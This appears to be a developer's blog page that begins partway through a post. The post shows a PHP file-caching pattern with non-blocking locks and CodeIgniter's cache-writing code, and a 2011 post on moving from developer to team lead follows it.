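Here is a minimal sketch of that "write if you can get the lock, otherwise just serve" pattern in plain PHP. $cachePath and renderPage() are hypothetical; renderPage() stands for the normal PHP/MySQL page build.

<?php
function serveWithFileCache($cachePath, $ttl = 3600)
{
    // serve straight from the cache while it is still fresh
    if (is_file($cachePath) && (time() - filemtime($cachePath)) < $ttl) {
        readfile($cachePath);
        return;
    }

    $html = renderPage();   // cache missing or expired: build the page (hypothetical)

    // try a non-blocking exclusive lock; if another request is already writing
    // the cache, skip the write and just echo the rendered output
    $fp = @fopen($cachePath, 'cb');   // 'c' does not truncate before we hold the lock
    if ($fp !== false) {
        if (flock($fp, LOCK_EX | LOCK_NB)) {
            ftruncate($fp, 0);
            fwrite($fp, $html);
            fflush($fp);
            flock($fp, LOCK_UN);
        }
        fclose($fp);
    }

    echo $html;
}
?>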

With CodeIgniter, this is how it works…

Line 299 of Output.php:-


if ( ! $fp = @fopen($cache_path, 'wb'))
        {
            log_message('error', "Unable to write cache file: ".$cache_path);
            return;
        }

The cache file is only written if it’s ‘really_writable’ (not locked)

Line 59 of Output.php:


elseif (($fp = @fopen($file, 'ab')) === FALSE)
    {
        return FALSE;


So… if we can't write it, we just render the second user's request.

Simple, and it works, beautifully... :-)

Tuesday, March 1, 2011

developer or team lead : pure development role to team leadership role

A few months ago, my role was pure development. My day used to be pure coding, and I generally enjoyed it. Over the last few months my job responsibilities have changed from developer to team lead. I still have a largely full plate of coding duties, but a few other things have been added: I'm expected to mentor other developers, work on requirements, make design decisions for other developers, evaluate bug reports from users, assign them to developers, handle team communication, etc.
I find that my day has become one interruption after another, and the prolonged periods of sustained concentration needed to get any actual quality coding done are becoming rarer and rarer.
As an individually-contributing developer, my job was to turn my own time in to software that the business could sell for a profit.

As a team lead, my job is to see that the team effectively turns their time in to software that the business could sell for a profit.
Some things fundamentally change when your perspective changes like that. These things have become much more important:-
  • Keeping other members of the team in a state that they can be productive
  • Delegating tasks to the least loaded team member
  • Strategically choosing which developer needs to learn which new skill to better load-balance the team, and investing some degree of my time in helping them learn that skill
  • Effectively communicating requirements (somebody told "Think twice before you start programming or you will program twice before you start thinking")
Notice that "writing good code myself" is no longer on my list of top concerns. If the task of "develop this major new thing" falls on me, it's almost always for one of a few reasons:-
  • The new thing is a framework item that will enable the rest of the team to be more productive (thus keeping them in a productive state)
  • The thing I'm working on is super-critical for customer satisfaction (usually that means it has to be done quickly and with little risk of failure)
  • The thing I'm working on has poorly-understood requirements, requiring someone with a high degree of domain knowledge to make quality requirement decisions while simultaneously doing development (one could argue that in this case, my inability to adequately form the requirements is the real shortcoming.)
  • helping the team most efficiently and effectively turn collective time in to software that the business can sell for a profit.
However, it's debatable, but I believe it works well. I'm keen to know what others think.

"Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning."
– Rich Cook